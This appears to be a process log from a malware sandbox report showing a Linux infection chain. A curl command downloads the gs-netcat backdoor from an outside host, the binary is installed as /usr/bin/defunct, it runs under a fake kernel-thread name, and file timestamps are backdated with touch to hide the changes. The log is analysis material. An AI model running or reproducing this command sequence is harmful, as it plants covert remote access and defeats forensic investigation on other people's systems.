                                                Arguments:curl -fsSL --connect-timeout 7 -m900 --retry 3 https://cdn.gsocket.io/bin/gs-netcat_mini-linux-x86_64 --output /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64
                                                File size:239848 bytes
                                                MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                                                Start time (UTC):09:12:04
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:04
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/mv
                                                Arguments:mv /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64 /dev/shm/.gs-0/gs-netcat
                                                File size:149888 bytes
                                                MD5 hash:504f0590fa482d4da070a702260e3716

                                                Start time (UTC):09:12:04
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:04
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/dirname
                                                Arguments:dirname /usr/bin/defunct
                                                File size:39256 bytes
                                                MD5 hash:aafc5c13efcc5fc5b28b2cce6547765a

                                                Start time (UTC):09:12:04
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:04
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/rm
                                                Arguments:rm -f /usr/bin/defunct
                                                File size:72056 bytes
                                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                Start time (UTC):09:12:04
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:04
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/dirname
                                                Arguments:dirname /usr/bin/defunct
                                                File size:39256 bytes
                                                MD5 hash:aafc5c13efcc5fc5b28b2cce6547765a

                                                Start time (UTC):09:12:04
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:04
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/touch
                                                Arguments:touch /usr/bin/defunct
                                                File size:100728 bytes
                                                MD5 hash:3859c173f5d3b37be3e531b7c84a9c68

                                                Start time (UTC):09:12:04
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:04
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/chmod
                                                Arguments:chmod 600 /usr/bin/defunct
                                                File size:63864 bytes
                                                MD5 hash:739483b900c045ae1374d6f53a86a279

                                                Start time (UTC):09:12:04
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:04
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/cp
                                                Arguments:cp /dev/shm/.gs-0/gs-netcat /usr/bin/defunct
                                                File size:153976 bytes
                                                MD5 hash:40f10ae7ea3e44218d1a8c306f79c83f

                                                Start time (UTC):09:12:04
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:04
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/dirname
                                                Arguments:dirname /dev/shm/.gs-0/gs-netcat
                                                File size:39256 bytes
                                                MD5 hash:aafc5c13efcc5fc5b28b2cce6547765a

                                                Start time (UTC):09:12:04
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:04
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/rm
                                                Arguments:rm -f /dev/shm/.gs-0/gs-netcat
                                                File size:72056 bytes
                                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                Start time (UTC):09:12:05
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:05
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/chmod
                                                Arguments:chmod 700 /usr/bin/defunct
                                                File size:63864 bytes
                                                MD5 hash:739483b900c045ae1374d6f53a86a279

                                                Start time (UTC):09:12:05
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:05
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:05
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/defunct
                                                Arguments:/usr/bin/defunct -g
                                                File size:2833840 bytes
                                                MD5 hash:d75cb9920d1d3d280518ddccfe4789d2

                                                Start time (UTC):09:12:05
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:05
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/defunct
                                                Arguments:[slub_flushwq]
                                                File size:2833840 bytes
                                                MD5 hash:d75cb9920d1d3d280518ddccfe4789d2

                                                Start time (UTC):09:12:05
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:05
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/rm
                                                Arguments:rm -rf /dev/shm/.gs-0/*
                                                File size:72056 bytes
                                                MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                                                Start time (UTC):09:12:05
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:05
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/rmdir
                                                Arguments:rmdir /dev/shm/.gs-0
                                                File size:47448 bytes
                                                MD5 hash:b02774276f8ce17de6458c24b05e6e07

                                                Start time (UTC):09:12:05
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:05
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/touch
                                                Arguments:touch -t 202410010411.39 /dev/shm
                                                File size:100728 bytes
                                                MD5 hash:3859c173f5d3b37be3e531b7c84a9c68

                                                Start time (UTC):09:12:05
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:05
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/touch
                                                Arguments:touch -t 202109170423.51 /usr/bin
                                                File size:100728 bytes
                                                MD5 hash:3859c173f5d3b37be3e531b7c84a9c68

                                                Start time (UTC):09:12:05
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/bash
                                                Arguments:-
                                                File size:1183448 bytes
                                                MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                Start time (UTC):09:12:05
                                                Start date (UTC):01/10/2024
                                                Path:/usr/bin/touch
                                                Arguments:touch -t 200611251713.29 /usr/bin/defunct
                                                File size:100728 bytes
                                                MD5 hash:3859c173f5d3b37be3e531b7c84a9c68